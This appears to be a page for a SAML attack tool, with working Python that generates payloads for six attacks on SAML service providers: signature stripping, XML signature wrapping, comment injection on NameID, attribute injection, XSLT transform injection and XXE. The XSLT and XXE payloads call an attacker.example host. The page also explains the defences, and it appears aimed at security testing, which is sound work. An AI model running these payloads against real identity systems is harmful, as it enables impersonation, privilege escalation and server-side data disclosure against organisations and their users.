SAML Forge decode · attack · forge

Workflow: paste a SAML token and decode it to see the parsed XML, the key fields and the attribute assertions; edit the XML if needed, then select, configure and generate an attack payload.
Attack Payloads select · configure · generate
1. Signature Stripping
Remove the <ds:Signature> block entirely: some SPs skip signature validation when no signature is present instead of rejecting the unsigned assertion.
Removes every <ds:Signature> element found in the assertion. An SP is only safe here if it requires a signature rather than merely validating one when it happens to be there.
2. XML Signature Wrapping (XSW)
The valid signature still covers the original element, which is kept (moved or duplicated) so the Reference URI resolves and verification passes, while the SP processes an attacker-controlled element that the signature never covered. 3 variants. The defence is to consume only the element the signature's Reference actually points to, not the first matching element in the document.
3. Comment Injection
Insert <!----> inside an element's text, for example between the part of a NameID the attacker wants to impersonate and the suffix they actually registered.
Result:
Signature validation canonicalizes the XML without comments and joins the surrounding text nodes, so the signed bytes are unchanged and the signature still verifies. An SP that reads the value from the first DOM text node (a common Java/Xerces pattern) sees only the text before the comment, not the full string the IdP signed.
4. Attribute Injection
Add or overwrite any attribute in the AttributeStatement, then re-encode the modified assertion. Changing signed content invalidates the signature, so this only succeeds against an SP that does not validate it, or when combined with signature stripping or wrapping.
5. XSLT Injection
Inject a <ds:Transform> with the XSLT algorithm into the Reference. SAML libraries whose XML-DSig code applies transforms through a full XSLT processor (Xalan, Saxon) execute the embedded stylesheet while computing the reference digest, regardless of whether the signature is ultimately valid.
6. XXE in SAML
Inject a DOCTYPE with an external entity reference into the SAML XML for server-side XXE. The DOCTYPE must precede the root element (after any XML declaration) and only fires if the SP's parser still processes DTDs and resolves external entities; hardened libraries disable both.
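The six payload generators above, as an added example that is not the tool's own code: stdlib-only Python that builds each payload from a constructed sample response (placeholder DigestValue/SignatureValue, no real signature) and, for comment injection, shows the two parser views that make the attack work. The attacker.example URLs, the `_evil` ID and the canary stylesheet are assumptions for illustration.

```python
import copy
import xml.etree.ElementTree as ET
from xml.dom import minidom

SAML_NS = "urn:oasis:names:tc:SAML:2.0:assertion"
SAMLP_NS = "urn:oasis:names:tc:SAML:2.0:protocol"
DS_NS = "http://www.w3.org/2000/09/xmldsig#"
XSL_NS = "http://www.w3.org/1999/XSL/Transform"
XSLT_ALG = "http://www.w3.org/TR/1999/REC-xslt-19991116"  # XMLDSig's XSLT transform identifier
for p, ns in (("saml", SAML_NS), ("samlp", SAMLP_NS), ("ds", DS_NS), ("xsl", XSL_NS)):
    ET.register_namespace(p, ns)  # keep the usual prefixes when re-serializing

# Constructed sample (not a real token): one signed Assertion in a Response, no XML declaration.
SAMPLE = f"""<samlp:Response xmlns:samlp="{SAMLP_NS}" xmlns:saml="{SAML_NS}" ID="_r1" Version="2.0">
<saml:Assertion ID="_a1" Version="2.0"><saml:Issuer>https://idp.example</saml:Issuer>
<ds:Signature xmlns:ds="{DS_NS}"><ds:SignedInfo><ds:Reference URI="#_a1"><ds:Transforms>
<ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/></ds:Transforms>
<ds:DigestValue>AAAA</ds:DigestValue></ds:Reference></ds:SignedInfo>
<ds:SignatureValue>BBBB</ds:SignatureValue></ds:Signature>
<saml:Subject><saml:NameID>alice@example.com.attacker.test</saml:NameID></saml:Subject>
<saml:AttributeStatement><saml:Attribute Name="role"><saml:AttributeValue>user</saml:AttributeValue>
</saml:Attribute></saml:AttributeStatement></saml:Assertion></samlp:Response>"""

def _q(ns, tag):
    return f"{{{ns}}}{tag}"  # Clark notation for ElementTree lookups

def strip_signatures(xml):
    """1. Drop every ds:Signature, wherever it sits in the tree."""
    root = ET.fromstring(xml)
    for parent in list(root.iter()):  # snapshot: removing while iterating skips siblings
        for sig in parent.findall(_q(DS_NS, "Signature")):
            parent.remove(sig)
    return ET.tostring(root, encoding="unicode")

def xsw_wrap(xml, evil_nameid):
    """2. One classic XSW variant: keep the signed Assertion so URI="#_a1" still resolves
    and verifies, but prepend an unsigned copy with a fresh ID and the attacker's NameID.
    An SP that checks 'a' signature and then consumes the first Assertion processes the copy."""
    root = ET.fromstring(xml)
    signed = root.find(_q(SAML_NS, "Assertion"))
    evil = copy.deepcopy(signed)
    evil.set("ID", "_evil")  # hypothetical ID; must differ from the referenced one
    evil.remove(evil.find(_q(DS_NS, "Signature")))
    evil.find(_q(SAML_NS, "Subject") + "/" + _q(SAML_NS, "NameID")).text = evil_nameid
    root.insert(list(root).index(signed), evil)
    return ET.tostring(root, encoding="unicode")

def inject_comment(xml, full_value, keep):
    """3. Split a text value with an empty comment right after the part to keep."""
    return xml.replace(f">{full_value}<", f">{keep}<!---->{full_value[len(keep):]}<", 1)

def nameid_first_text_node(xml):
    """What a DOM-based SP reading firstChild.nodeValue gets: minidom keeps the comment
    as a node, so the text is split and only the piece before the comment comes back."""
    return minidom.parseString(xml).getElementsByTagNameNS(SAML_NS, "NameID")[0].firstChild.data

def nameid_canonical_text(xml):
    """What the digest is computed over: C14N drops comments and the text joins back up
    (ElementTree's default parser discards comments the same way), so the signature holds."""
    return ET.fromstring(xml).findtext(".//" + _q(SAML_NS, "NameID"))

def inject_attribute(xml, name, value):
    """4. Add or overwrite an Attribute. This changes signed content, so pair it with
    1 or 2, or aim it at an SP that never checks the signature."""
    root = ET.fromstring(xml)
    stmt = root.find(".//" + _q(SAML_NS, "AttributeStatement"))
    attr = stmt.find(_q(SAML_NS, "Attribute") + f"[@Name='{name}']")
    if attr is None:
        attr = ET.SubElement(stmt, _q(SAML_NS, "Attribute"), Name=name)
    for old in list(attr):
        attr.remove(old)
    ET.SubElement(attr, _q(SAML_NS, "AttributeValue")).text = value
    return ET.tostring(root, encoding="unicode")

# Constructed canary stylesheet: document() against an attacker-chosen (hypothetical) URL.
XSLT_CANARY = f"""<xsl:stylesheet xmlns:xsl="{XSL_NS}" version="1.0"><xsl:template match="/">
<xsl:value-of select="document('https://attacker.example/canary')"/></xsl:template></xsl:stylesheet>"""

def inject_xslt_transform(xml, stylesheet=XSLT_CANARY):
    """5. Append an XSLT ds:Transform to the Reference; a verifier that honours the XSLT
    algorithm runs the stylesheet while computing the digest, valid signature or not."""
    root = ET.fromstring(xml)
    transform = ET.SubElement(root.find(".//" + _q(DS_NS, "Transforms")),
                              _q(DS_NS, "Transform"), Algorithm=XSLT_ALG)
    transform.append(ET.fromstring(stylesheet))
    return ET.tostring(root, encoding="unicode")

def wrap_xxe(xml, url="https://attacker.example/xxe"):
    """6. Prepend a DOCTYPE declaring an external entity and reference it from Issuer.
    Fires only if the SP's parser still processes DTDs and resolves external entities."""
    doctype = f'<!DOCTYPE samlp:Response [<!ENTITY xxe SYSTEM "{url}">]>\n'
    return doctype + xml.replace("<saml:Issuer>", "<saml:Issuer>&xxe;", 1)

def assertions(xml):
    """(ID, carries a Signature, NameID) per Assertion in document order: the SP's view."""
    root = ET.fromstring(xml)
    return [(a.get("ID"), a.find(_q(DS_NS, "Signature")) is not None,
             a.findtext(_q(SAML_NS, "Subject") + "/" + _q(SAML_NS, "NameID")))
            for a in root.iter(_q(SAML_NS, "Assertion"))]

def attribute_values(xml):
    """Name -> first AttributeValue for every Attribute in the document."""
    return {a.get("Name"): a.findtext(_q(SAML_NS, "AttributeValue"))
            for a in ET.fromstring(xml).iter(_q(SAML_NS, "Attribute"))}
```

The two NameID readers are the point of attack 3: run both over `inject_comment(SAMPLE, "alice@example.com.attacker.test", "alice@example.com")` and the first-text-node view returns `alice@example.com` while the canonical view (what the digest covers) still returns the full registered value. Real signing and verification are deliberately absent; feed the generated strings to the SP or library under test, base64-encoded for a POST binding.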